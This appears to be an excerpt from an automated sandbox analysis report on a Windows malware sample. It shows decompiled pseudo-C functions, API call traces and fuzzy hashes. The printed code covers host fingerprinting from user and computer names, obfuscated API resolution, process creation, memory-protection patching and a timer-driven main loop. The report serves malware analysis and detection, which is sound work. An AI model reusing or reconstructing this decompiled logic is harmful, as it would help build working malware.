                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Heap$Free$lstrcatlstrlenwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                              • String ID: Uxt
                              • API String ID: 1384543093-1536154274
                              • Opcode ID: 73d8ec9f746056590fe39d272aacdbfe3506b1c633804b28e00ca8f5e410db30
                              • Instruction ID: ead499d8d7bf53be8b233e4c99148755944bf8b7823ac5014c38fae080d9bff7
                              • Opcode Fuzzy Hash: 73d8ec9f746056590fe39d272aacdbfe3506b1c633804b28e00ca8f5e410db30
                              • Instruction Fuzzy Hash: 58519E71509204AFEB11AF69EC44E6ABFE9FF88304F054635F548D2160CB39ED95CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D5038, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 152timememoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 83%
                              			E049D5038(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				intOrPtr _t67;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x49dd278);
					_v76 = 0;
					_v80 = 0;
					L049DB030();
					_v84.LowPart = _t46;
					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x49dd2a4; // 0x2e0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x49dd284 = 5;
						} else {
							_t68 = E049D4C56(_t75); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x49dd298 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E049D5B5B(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_t97 = _t65 - 3;
						_v104.LowPart = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_t67 = E049D6006(_t74, _t97,  &_v72, _a4, _a8); // executed
							_v120 = _t67;
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x49dd27c);
							goto L21;
						} else {
							__eflags =  *0x49dd280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E049D55F1();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x49dd280);
								L21:
								L049DB030();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								__eflags = _t64;
								_v128 = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0x49dd270, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

































                              0x049d5038
                              0x049d504e
                              0x049d5052
                              0x049d5057
                              0x049d505e
                              0x049d5066
                              0x049d506a
                              0x049d51f2
                              0x049d5070
                              0x049d5070
                              0x049d5072
                              0x049d5077
                              0x049d5078
                              0x049d507e
                              0x049d5082
                              0x049d5086
                              0x049d5094
                              0x049d50a2
                              0x049d50a6
                              0x049d50a8
                              0x049d50b5
                              0x049d50c1
                              0x049d50c5
                              0x049d50c9
                              0x049d50d2
                              0x049d50dd
                              0x049d50dd
                              0x049d50d4
                              0x049d50d4
                              0x049d50db
                              0x00000000
                              0x00000000
                              0x049d50db
                              0x049d50e7
                              0x00000000
                              0x049d50eb
                              0x049d50f0
                              0x049d50fb
                              0x049d50fb
                              0x049d5103
                              0x049d510e
                              0x049d5116
                              0x049d511f
                              0x049d5122
                              0x049d5126
                              0x049d512d
                              0x049d5131
                              0x00000000
                              0x00000000
                              0x049d5133
                              0x049d5137
                              0x049d513a
                              0x049d513e
                              0x00000000
                              0x049d5140
                              0x049d514b
                              0x049d5150
                              0x049d5150
                              0x00000000
                              0x049d5181
                              0x049d5181
                              0x049d5186
                              0x049d51a5
                              0x049d51a7
                              0x049d51ac
                              0x049d51ad
                              0x00000000
                              0x049d5188
                              0x049d5188
                              0x049d518e
                              0x00000000
                              0x049d5190
                              0x049d5190
                              0x049d5195
                              0x049d5197
                              0x049d519c
                              0x049d519d
                              0x049d51b3
                              0x049d51b3
                              0x049d51bb
                              0x049d51c9
                              0x049d51cd
                              0x049d51d9
                              0x049d51db
                              0x049d51dd
                              0x049d51e1
                              0x00000000
                              0x049d51e7
                              0x00000000
                              0x049d51e7
                              0x049d51e1
                              0x049d518e
                              0x00000000
                              0x049d5186
                              0x049d5154
                              0x049d5156
                              0x049d515a
                              0x049d515b
                              0x049d515b
                              0x049d515f
                              0x049d5169
                              0x049d5169
                              0x049d516f
                              0x049d5172
                              0x049d5172
                              0x049d5179
                              0x049d5179
                              0x049d5200
                              0x00000000

                              APIs
                              • memset.NTDLL ref: 049D5052
                              • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 049D505E
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 049D5086
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 049D50A6
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,049D5A39,?), ref: 049D50C1
                              • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,049D5A39,?,00000000), ref: 049D5169
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,049D5A39,?,00000000,?,?), ref: 049D5179
                              • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 049D51B3
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 049D51CD
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 049D51D9
                                • Part of subcall function 049D4C56: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,058193B8,00000000,?,747DF710,00000000,747DF730), ref: 049D4CA5
                                • Part of subcall function 049D4C56: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,058193F0,?,00000000,30314549,00000014,004F0053,058193AC), ref: 049D4D42
                                • Part of subcall function 049D4C56: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049D50D9), ref: 049D4D54
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,049D5A39,?,00000000,?,?), ref: 049D51EC
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                              • String ID: Uxt
                              • API String ID: 3521023985-1536154274
                              • Opcode ID: c2f414eba09d87ef3ca659c62740e3272db03b02166e32903df8cea0ea79af65
                              • Instruction ID: 5c9d6bad5d659ce8816e642ab411ed38796e4e04d9cd96f058fe9d77a2c0b5fa
                              • Opcode Fuzzy Hash: c2f414eba09d87ef3ca659c62740e3272db03b02166e32903df8cea0ea79af65
                              • Instruction Fuzzy Hash: C1514BB1409311BFDB109F15DC44D9BBFECEF89768F108A2AF56492190D774E944CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053E22AA, Relevance: 21.1, APIs: 14, Instructions: 121memorysynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,053E2516), ref: 053E22D3
                              • RtlDeleteCriticalSection.NTDLL(053F0440), ref: 053E2306
                              • RtlDeleteCriticalSection.NTDLL(053F0460), ref: 053E230D
                              • ReleaseMutex.KERNEL32(000007D0,00000000,?,?,?,053E2516), ref: 053E2335
                              • CloseHandle.KERNEL32(?,?,053E2516), ref: 053E2341
                              • ResetEvent.KERNEL32(00000000,00000000,?,?,?,053E2516), ref: 053E234D
                              • CloseHandle.KERNEL32(?,?,053E2516), ref: 053E2359
                              • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,053E2516), ref: 053E235F
                              • SleepEx.KERNEL32(00000064,00000001,?,?,053E2516), ref: 053E2373
                              • HeapFree.KERNEL32(00000000,00000000,?,?,053E2516), ref: 053E2396
                              • RtlRemoveVectoredExceptionHandler.NTDLL(04AD05B8), ref: 053E23D0
                              • SleepEx.KERNEL32(00000064,00000001,?,?,053E2516), ref: 053E23DF
                              • CloseHandle.KERNEL32(064FF048,?,?,053E2516), ref: 053E2406
                              • LocalFree.KERNEL32(?,?,053E2516), ref: 053E2416
                                • Part of subcall function 053D4132: GetVersion.KERNEL32(?,00000000,747DF720,?,053E22C4,00000000,?,?,?,053E2516), ref: 053D4156
                                • Part of subcall function 053D4132: GetModuleHandleA.KERNEL32(?,064F9723,?,053E22C4,00000000,?,?,?,053E2516), ref: 053D4173
                                • Part of subcall function 053D4132: GetProcAddress.KERNEL32(00000000), ref: 053D417A
                                • Part of subcall function 053E3BE1: RtlEnterCriticalSection.NTDLL(053F0460), ref: 053E3BEB
                                • Part of subcall function 053E3BE1: RtlLeaveCriticalSection.NTDLL(053F0460), ref: 053E3C27
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalHandleSectionSleep$Close$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                              • String ID:
                              • API String ID: 1765366784-0
                              • Opcode ID: eb0dc9e0854f7b06fd7a76d86f910d511ac1326847cefafa817ff04c13f409e3
                              • Instruction ID: e39d5746ed77aeb6e08099c82c028d0ea9cea3a30f6d84988209de55ea60b243
                              • Opcode Fuzzy Hash: eb0dc9e0854f7b06fd7a76d86f910d511ac1326847cefafa817ff04c13f409e3
                              • Instruction Fuzzy Hash: FE415039654215ABDB25AFACEC8E95A7BEEB700705F550425F603DB192CFB19C408F20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049DA303, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 96%
                              			E049DA303(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x49dd2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E049D7855( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x49dd2b4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x49dd270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E049D47A4(_v8 + _v8, _t63);
							}
							HeapFree( *0x49dd270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x49dd270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E049D47A4(_v8 + _v8, _t63);
						}
						HeapFree( *0x49dd270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                              0x049da303
                              0x049da30b
                              0x049da311
                              0x049da314
                              0x049da317
                              0x049da319
                              0x049da31e
                              0x049da31e
                              0x049da324
                              0x049da326
                              0x049da333
                              0x049da394
                              0x049da335
                              0x049da33a
                              0x049da340
                              0x049da345
                              0x049da353
                              0x049da357
                              0x049da366
                              0x049da36d
                              0x049da374
                              0x049da374
                              0x049da37f
                              0x049da37f
                              0x049da357
                              0x049da345
                              0x049da396
                              0x049da39c
                              0x049da3a6
                              0x049da3a8
                              0x049da3ad
                              0x049da3bc
                              0x049da3c0
                              0x049da3cb
                              0x049da3d2
                              0x049da3d9
                              0x049da3d9
                              0x049da3e5
                              0x049da3e5
                              0x049da3c0
                              0x049da3ee
                              0x049da3f0
                              0x049da3f3
                              0x049da3f5
                              0x049da3f8
                              0x049da3fb
                              0x049da405
                              0x049da409
                              0x049da40d

                              APIs
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 049DA33A
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 049DA351
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 049DA35E
                              • HeapFree.KERNEL32(00000000,00000000), ref: 049DA37F
                              • GetComputerNameW.KERNEL32(00000000,00000000), ref: 049DA3A6
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 049DA3BA
                              • GetComputerNameW.KERNEL32(00000000,00000000), ref: 049DA3C7
                              • HeapFree.KERNEL32(00000000,00000000), ref: 049DA3E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: HeapName$AllocateComputerFreeUser
                              • String ID: Uxt
                              • API String ID: 3239747167-1536154274
                              • Opcode ID: 019a6c775aa443170eff6f474b9b2cb41624cafd5f54a5ebc0ac99dc7afdfbd1
                              • Instruction ID: 0ff27234fda482a1a6a07641aa241acb9615b14905d1f5f2dd992f4b52470c70
                              • Opcode Fuzzy Hash: 019a6c775aa443170eff6f474b9b2cb41624cafd5f54a5ebc0ac99dc7afdfbd1
                              • Instruction Fuzzy Hash: CF31F471A05209EFEB11DFA9D981A6EFBFAEB88300B118539E505E3240E734EE519B10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D4CC6, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(053EF4B4,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D13
                              • VirtualProtect.KERNEL32(00000000,00000000,00000040,-00000020,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D25
                              • lstrcpy.KERNEL32(00000000,053EF4B4), ref: 053D4D34
                              • VirtualProtect.KERNEL32(00000000,00000000,?,-00000020,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D45
                              • VirtualProtect.KERNEL32(?,00000005,00000040,-00000020,053EC508,00000018,053C35A8,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D7B
                              • VirtualProtect.KERNEL32(?,00000004,?,-00000020,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D96
                              • VirtualProtect.KERNEL32(?,00000004,00000040,-00000020,053EC508,00000018,053C35A8,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4DAB
                              • VirtualProtect.KERNEL32(?,00000004,00000040,-00000020,053EC508,00000018,053C35A8,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4DD8
                              • VirtualProtect.KERNEL32(?,00000004,?,-00000020,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4DF2
                              • GetLastError.KERNEL32(?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4DF9
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                              • String ID:
                              • API String ID: 3676034644-0
                              • Opcode ID: f6966ec16159e187c1e4d36edb4ae5da0a30fecccd048c2486c6f61c616fd60c
                              • Instruction ID: 3271f097645ae61411ae19471f0bfabaaada5603eb204f10e0e66689fb44abbf
                              • Opcode Fuzzy Hash: f6966ec16159e187c1e4d36edb4ae5da0a30fecccd048c2486c6f61c616fd60c
                              • Instruction Fuzzy Hash: 83412CB2900709AFDF318F65DC44EAAFBF9FB08310F008615E656AA591DBB4E805CB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D87A1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                              Download Yara Rule
                              C-Code - Quality: 73%
                              			E049D87A1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E049D6CE5(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E049DAA99( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x49dd298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x49dd2b8; // 0xe3a5a8
					_t18 = _t47 + 0x49de3b3; // 0x73797325
					_t68 = E049D70F1(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x49dd2b8; // 0xe3a5a8
						_t19 = _t50 + 0x49de760; // 0x5818d08
						_t20 = _t50 + 0x49de0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E049D2522();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E049D2522();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x49dd270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E049D6DFA(_t70);
				goto L12;
			}


















                              0x049d87a9
                              0x049d87a9
                              0x049d87b8
                              0x049d87c1
                              0x049d87c4
                              0x049d88d1
                              0x049d88d8
                              0x049d88d8
                              0x049d87d3
                              0x049d87db
                              0x049d87e0
                              0x049d87e3
                              0x049d87f8
                              0x049d87fe
                              0x049d87ff
                              0x049d8802
                              0x049d8808
                              0x049d880b
                              0x049d8810
                              0x049d8818
                              0x049d8824
                              0x049d8828
                              0x049d88b8
                              0x049d882e
                              0x049d882e
                              0x049d8833
                              0x049d883a
                              0x049d884e
                              0x049d8852
                              0x049d88a1
                              0x049d8854
                              0x049d8855
                              0x049d885c
                              0x049d8875
                              0x049d8877
                              0x049d887b
                              0x049d8882
                              0x049d889c
                              0x049d8884
                              0x049d888d
                              0x049d8892
                              0x049d8892
                              0x049d8882
                              0x049d88b0
                              0x049d88b0
                              0x049d8828
                              0x049d88bf
                              0x049d88c8
                              0x049d88cc
                              0x00000000

                              APIs
                                • Part of subcall function 049D6CE5: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,049D87BD,?,?,?,?,00000000,00000000), ref: 049D6D0A
                                • Part of subcall function 049D6CE5: GetProcAddress.KERNEL32(00000000,7243775A), ref: 049D6D2C
                                • Part of subcall function 049D6CE5: GetProcAddress.KERNEL32(00000000,614D775A), ref: 049D6D42
                                • Part of subcall function 049D6CE5: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049D6D58
                                • Part of subcall function 049D6CE5: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049D6D6E
                                • Part of subcall function 049D6CE5: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049D6D84
                              • memset.NTDLL ref: 049D880B
                                • Part of subcall function 049D70F1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,049D8824,73797325), ref: 049D7102
                                • Part of subcall function 049D70F1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 049D711C
                              • GetModuleHandleA.KERNEL32(4E52454B,05818D08,73797325), ref: 049D8841
                              • GetProcAddress.KERNEL32(00000000), ref: 049D8848
                              • HeapFree.KERNEL32(00000000,00000000), ref: 049D88B0
                                • Part of subcall function 049D2522: GetProcAddress.KERNEL32(36776F57,049D6342), ref: 049D253D
                              • CloseHandle.KERNEL32(00000000,00000001), ref: 049D888D
                              • CloseHandle.KERNEL32(?), ref: 049D8892
                              • GetLastError.KERNEL32(00000001), ref: 049D8896
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                              • String ID: Uxt
                              • API String ID: 3075724336-1536154274
                              • Opcode ID: a14a61b8a4389b3131a201ebdf0d3371671cce540cb9325f69201935cdfee4ac
                              • Instruction ID: 82c52208d450bc852bfc69837bb78ed942bc308d3ff8fc46bddb2b0572625af5
                              • Opcode Fuzzy Hash: a14a61b8a4389b3131a201ebdf0d3371671cce540cb9325f69201935cdfee4ac
                              • Instruction Fuzzy Hash: 43311BB6904208BFEF11EFA4DC88D9EBBBCEB48344F148575E616A7151D734AD44CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D5C7F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 74%
                              			E049D5C7F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L049DB02A();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x49dd2b8; // 0xe3a5a8
				_t5 = _t13 + 0x49de876; // 0x5818e1e
				_t6 = _t13 + 0x49de59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L049DAD4A();
				_t17 = CreateFileMappingW(0xffffffff, 0x49dd2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                              0x049d5c7f
                              0x049d5c87
                              0x049d5c8b
                              0x049d5c91
                              0x049d5c96
                              0x049d5c9b
                              0x049d5c9e
                              0x049d5ca1
                              0x049d5ca6
                              0x049d5ca7
                              0x049d5caa
                              0x049d5caf
                              0x049d5cb6
                              0x049d5cc0
                              0x049d5cc2
                              0x049d5cc3
                              0x049d5cc6
                              0x049d5ce2
                              0x049d5ce8
                              0x049d5cec
                              0x049d5d3a
                              0x049d5cee
                              0x049d5cfb
                              0x049d5d0b
                              0x049d5d13
                              0x049d5d25
                              0x049d5d29
                              0x00000000
                              0x00000000
                              0x049d5d15
                              0x049d5d18
                              0x049d5d1d
                              0x049d5d1f
                              0x049d5d1f
                              0x049d5cfd
                              0x049d5cff
                              0x049d5d2b
                              0x049d5d2c
                              0x049d5d2c
                              0x049d5cfb
                              0x049d5d41

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,049D590B,?,?,4D283A53,?,?), ref: 049D5C8B
                              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 049D5CA1
                              • _snwprintf.NTDLL ref: 049D5CC6
                              • CreateFileMappingW.KERNELBASE(000000FF,049DD2E4,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 049D5CE2
                              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,049D590B,?,?,4D283A53,?), ref: 049D5CF4
                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 049D5D0B
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,049D590B,?,?,4D283A53), ref: 049D5D2C
                              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,049D590B,?,?,4D283A53,?), ref: 049D5D34
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                              • String ID:
                              • API String ID: 1814172918-0
                              • Opcode ID: c17600c969450e4b59c268dbf43343dc3069e4118fe24fc22b3bbc939d78323f
                              • Instruction ID: d634b7b4059a29d3d8a4f52900501c5e4ebc65d552481b2dc092b054b7298a04
                              • Opcode Fuzzy Hash: c17600c969450e4b59c268dbf43343dc3069e4118fe24fc22b3bbc939d78323f
                              • Instruction Fuzzy Hash: 4921A572605204BBEB11EF64DC09F9D7BB9EB88760F158231F606EB1D0EA70E945CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CADDF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053E4E7E: VirtualProtect.KERNEL32(?,?,00000040,00000000,011075A8,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EA3
